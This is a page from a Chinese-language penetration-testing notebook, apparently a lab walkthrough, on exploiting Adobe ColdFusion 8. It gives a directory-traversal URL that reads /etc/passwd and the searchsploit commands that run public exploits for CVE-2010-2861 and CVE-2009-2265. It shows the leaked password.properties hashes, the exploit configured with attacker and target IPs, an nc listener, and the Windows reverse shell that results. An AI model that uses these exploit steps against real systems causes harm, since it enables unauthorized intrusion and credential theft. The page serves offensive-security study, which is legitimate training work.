0xdfxyz
  • Penetration Testing Process
    • README.md
    • Whois
  • Nikto
  • Search Engine Discovery
  • FinalRecon
  • Nessus
  • 0_新手上路
    • 0_新手上路
  • 1_訊息收集
    • 服務枚舉
      • Page 6
      • Nmap
      • DNS
    • 應用枚舉
      • Page 6
    • A D枚舉
      • Page 6
    • web枚舉
      • Page 6
      • Web Fuzzing
      • Subdomain
  • 2_漏洞前準備
    • 反彈 Shell
    • 工具彙總
    • 字典生成
  • 3_漏洞利用
    • 應用漏洞利用
    • AD 攻擊
    • 二進位漏洞利用
    • Web漏洞利用
      • XSS
      • IDOR
      • Webshel​​l
      • File uploads
      • SSTI
      • LFI
      • SQL injection
      • XXE
      • HTTP Verb Tampering
      • Command Injection
    • 服務漏洞利用
      • CMS
        • Wordpress
        • Joolmla
        • Drupal
      • Servlet 容器/軟體開發
        • Jenkins
        • Tomcat
      • 基礎設施/網路監控工具
        • Splunk
        • PRTG Network Monitor
      • 客戶服務管理與配置管理
        • osTicket
        • Gitlab
      • 通用網關介面
        • 攻擊通用網關介面 (CGI) 應用程式 - Shellshock
      • 其他應用
        • ColdFusion
        • IIS Tilde
        • LDAP
      • 常見應用程式
        • Thick client(也稱為rich客戶端或fat客戶端
        • Web 批量分配漏洞 ( Ruby on Rails)
        • 攻擊連接到服務的應用程式(SSH)
  • 4_滲透
    • Linux 權限提升
    • Windows 權限提升
    • Windows + Linux 工具
  • 5_橫向移動
    • 工具
    • 跳板 Pivoting
    • AD 橫向移動
    • Linux 橫向移動
    • Windows 橫向移動
  • 6_NetExec
    • 常見模組
    • 命令執行
    • 漏洞掃描模組
    • 模組使用
    • 憑證轉儲
    • Kerberos 認證
    • LDAP RDP 枚舉
    • SMB 枚舉
由 GitBook 提供支持
在本页
  • 🔍 1. 發現點
  • 🚀 2. 測試Payload
  • 🎯 3. 取得反向 Shell
  • 🔗 5. 連鎖漏洞

这有帮助吗?

  1. 3_漏洞利用
  2. 服務漏洞利用
  3. 其他應用

ColdFusion

上一页其他應用下一页IIS Tilde

最后更新于2个月前

这有帮助吗?

商用的快速應用程式開發平台,在1995年由JJ Allaire開創。ColdFusion最初是為了建立能與連接的網站而開發的。2.0版本(1996年推出)以後,它成為了一個全面的開發平台,包括一個以及功能全面的。ColdFusion支援的(ColdFusion Markup Language)是一種,檔案以*.cfm為,在ColdFusion專用的應用伺服器環境下執行。cfm檔案被編譯器翻譯為對應的語言程式,然後執行並向瀏覽器返回結果。它的設計思想被一些人認為非常先進,被一些語言所借鑑。

🔍 1. 發現點

  • 目標系統: Adobe ColdFusion 8

  • 已知漏洞:

    1. 目錄遍歷 (Directory Traversal) → CVE-2010-2861

    2. 遠端程式碼執行 (Remote Code Execution, RCE) → CVE-2009-2265

  • 使用 searchsploit 尋找漏洞:

    searchsploit adobe coldfusion

    發現 ColdFusion 8 RCE & 目錄遍歷漏洞


🚀 2. 測試Payload

📂 目錄遍歷 (CVE-2010-2861)

  • 驗證漏洞

    http://www.example.com/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../etc/passwd
  • 使用 Searchsploit 複製並執行 PoC

    searchsploit -p 14641
    cp /usr/share/exploitdb/exploits/multiple/remote/14641.py .
    python2 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
  • 成功獲取 password.properties

    txt複製編輯rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
    password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
    encrypted=true

💀 RCE (CVE-2009-2265)

  • 下載並執行 RCE Exploit

    searchsploit -p 50057
    cp /usr/share/exploitdb/exploits/cfm/webapps/50057.py .
  • 修改 Exploit 參數

    if __name__ == '__main__':
        lhost = '10.10.14.55'  # 攻擊者 VPN IP
        lport = 4444           # 監聽端口
        rhost = "10.129.247.30" # 目標 IP
        rport = 8500           # ColdFusion 端口
        filename = uuid.uuid4().hex
  • 執行攻擊

    python3 50057.py

🎯 3. 取得反向 Shell

  • 開始監聽

    nc -lvnp 4444
  • 成功獲取遠端 Shell

    Microsoft Windows [Version 6.1.7600]
    C:\ColdFusion8\runtime\bin>

🔗 5. 連鎖漏洞

✅ ColdFusion 8 目錄遍歷 → 洩露敏感文件 (password.properties) ✅ 利用 password.properties 嘗試解密管理密碼 ✅ ColdFusion 8 RCE → 上傳 Web Shell 獲取遠端存取 ✅ 進一步提權或橫向移動

資料庫
整合式開發環境
手稿語言
CFML
手稿語言
檔名
C++